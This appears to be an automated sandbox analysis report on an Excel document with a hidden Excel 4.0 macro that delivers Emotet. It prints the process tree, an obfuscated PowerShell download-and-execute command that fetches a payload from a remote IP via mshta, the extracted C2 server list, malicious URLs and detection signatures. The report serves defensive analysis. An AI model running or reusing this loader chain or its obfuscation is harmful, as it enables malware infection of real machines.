Loading ...

Play interactive tourEdit tour

Windows Analysis Report ggnlRjkfr4

Overview

General Information

Sample Name:ggnlRjkfr4 (renamed file extension from none to xls)
Analysis ID:544305
MD5:6c23aab5ed898b3b5629c8c6a91c96c3
SHA1:603910f1c1df4c58bf59eec256d6957f0e0a9184
SHA256:bb1f500a59544aa8e44a0377cc506dfbebca1ecb7a8c73dc72d3268803976ff5
Tags:excelxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
Antivirus detection for URL or domain
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Tries to detect virtualization through RDTSC time measurements
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Enables debug privileges
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2188 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1532 cmdline: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2696 cmdline: mshta http://87.251.86.178/pp/oo.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2628 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2592 cmdline: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1208 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["54.37.212.235:80", "45.15.23.184:443", "41.76.108.46:8080", "212.237.5.209:443", "46.55.222.11:443", "207.38.84.195:8080", "103.8.26.102:8080", "138.185.72.26:8080", "104.251.214.46:8080", "110.232.117.186:8080", "51.68.175.8:8080", "176.104.106.96:8080", "216.158.226.206:443", "103.8.26.103:8080", "103.75.201.2:443", "210.57.217.132:8080", "195.154.133.20:443", "45.142.114.231:8080", "107.182.225.142:8080", "158.69.222.101:443", "45.118.115.99:8080", "192.254.71.210:443", "178.79.147.66:8080", "203.114.109.124:443", "212.237.56.116:7080", "173.212.193.249:8080", "58.227.42.236:80", "50.116.54.215:443", "162.214.50.39:7080", "45.118.135.203:7080", "212.237.17.99:8080", "81.0.236.90:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ggnlRjkfr4.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x6f9d:$e1: Enable Editing
  • 0x6fdb:$e2: Enable Content
ggnlRjkfr4.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x33d2:$s1: Excel
  • 0x7020:$s1: Excel
  • 0xd0a2:$s1: Excel
  • 0xe0d7:$s1: Excel
  • 0xe120:$s1: Excel
  • 0x3449:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
ggnlRjkfr4.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.577830349.0000000000602000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000008.00000002.577733868.0000000000180000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.rundll32.exe.180000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          8.2.rundll32.exe.180000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious MSHTA Process PatternsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://87.251.86.178/pp/oo.html, CommandLine: mshta http://87.251.86.178/pp/oo.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1532, ProcessCommandLine: mshta http://87.251.86.178/pp/oo.html, ProcessId: 2696
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, CommandLine: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2188, ProcessCommandLine: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, ProcessId: 1532
            Sigma detected: Suspicious PowerShell Command LineShow sources
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 8.2.rundll32.exe.180000.0.unpackMalware Configuration Extractor: Emotet {"C2 list": ["54.37.212.235:80", "45.15.23.184:443", "41.76.108.46:8080", "212.237.5.209:443", "46.55.222.11:443", "207.38.84.195:8080", "103.8.26.102:8080", "138.185.72.26:8080", "104.251.214.46:8080", "110.232.117.186:8080", "51.68.175.8:8080", "176.104.106.96:8080", "216.158.226.206:443", "103.8.26.103:8080", "103.75.201.2:443", "210.57.217.132:8080", "195.154.133.20:443", "45.142.114.231:8080", "107.182.225.142:8080", "158.69.222.101:443", "45.118.115.99:8080", "192.254.71.210:443", "178.79.147.66:8080", "203.114.109.124:443", "212.237.56.116:7080", "173.212.193.249:8080", "58.227.42.236:80", "50.116.54.215:443", "162.214.50.39:7080", "45.118.135.203:7080", "212.237.17.99:8080", "81.0.236.90:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: ggnlRjkfr4.xlsVirustotal: Detection: 11%Perma Link
            Antivirus detection for URL or domainShow sources
            Source: http://87.251.86.178/pp/PP.PNGAvira URL Cloud: Label: malware
            Source: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/PE3Avira URL Cloud: Label: malware
            Source: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/PE3Avira URL Cloud: Label: malware
            Source: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/Avira URL Cloud: Label: malware
            Source: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/Avira URL Cloud: Label: malware
            Source: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/Avira URL Cloud: Label: malware
            Source: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/PE3Avira URL Cloud: Label: malware
            Source: http://87.251.86.178/pp/oo.htmlAvira URL Cloud: Label: malware
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: >ystem.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729CB634 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,8_2_729CB634
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729CB581 _free,_free,FindFirstFileExW,_free,8_2_729CB581
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

            Software Vulnerabilities:

            barindex
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
            Source: global trafficDNS query: name: www.catholicroundup.com
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.251.86.178:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.251.86.178:80

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorIPs: 54.37.212.235:80
            Source: Malware configuration extractorIPs: 45.15.23.184:443
            Source: Malware configuration extractorIPs: 41.76.108.46:8080
            Source: Malware configuration extractorIPs: 212.237.5.209:443
            Source: Malware configuration extractorIPs: 46.55.222.11:443
            Source: Malware configuration extractorIPs: 207.38.84.195:8080
            Source: Malware configuration extractorIPs: 103.8.26.102:8080
            Source: Malware configuration extractorIPs: 138.185.72.26:8080
            Source: Malware configuration extractorIPs: 104.251.214.46:8080
            Source: Malware configuration extractorIPs: 110.232.117.186:8080
            Source: Malware configuration extractorIPs: 51.68.175.8:8080
            Source: Malware configuration extractorIPs: 176.104.106.96:8080
            Source: Malware configuration extractorIPs: 216.158.226.206:443
            Source: Malware configuration extractorIPs: 103.8.26.103:8080
            Source: Malware configuration extractorIPs: 103.75.201.2:443
            Source: Malware configuration extractorIPs: 210.57.217.132:8080
            Source: Malware configuration extractorIPs: 195.154.133.20:443
            Source: Malware configuration extractorIPs: 45.142.114.231:8080
            Source: Malware configuration extractorIPs: 107.182.225.142:8080
            Source: Malware configuration extractorIPs: 158.69.222.101:443
            Source: Malware configuration extractorIPs: 45.118.115.99:8080
            Source: Malware configuration extractorIPs: 192.254.71.210:443
            Source: Malware configuration extractorIPs: 178.79.147.66:8080
            Source: Malware configuration extractorIPs: 203.114.109.124:443
            Source: Malware configuration extractorIPs: 212.237.56.116:7080
            Source: Malware configuration extractorIPs: 173.212.193.249:8080
            Source: Malware configuration extractorIPs: 58.227.42.236:80
            Source: Malware configuration extractorIPs: 50.116.54.215:443
            Source: Malware configuration extractorIPs: 162.214.50.39:7080
            Source: Malware configuration extractorIPs: 45.118.135.203:7080
            Source: Malware configuration extractorIPs: 212.237.17.99:8080
            Source: Malware configuration extractorIPs: 81.0.236.90:443
            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
            Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
            Source: global trafficHTTP traffic detected: GET /pp/PP.PNG HTTP/1.1Host: 87.251.86.178Connection: Keep-Alive
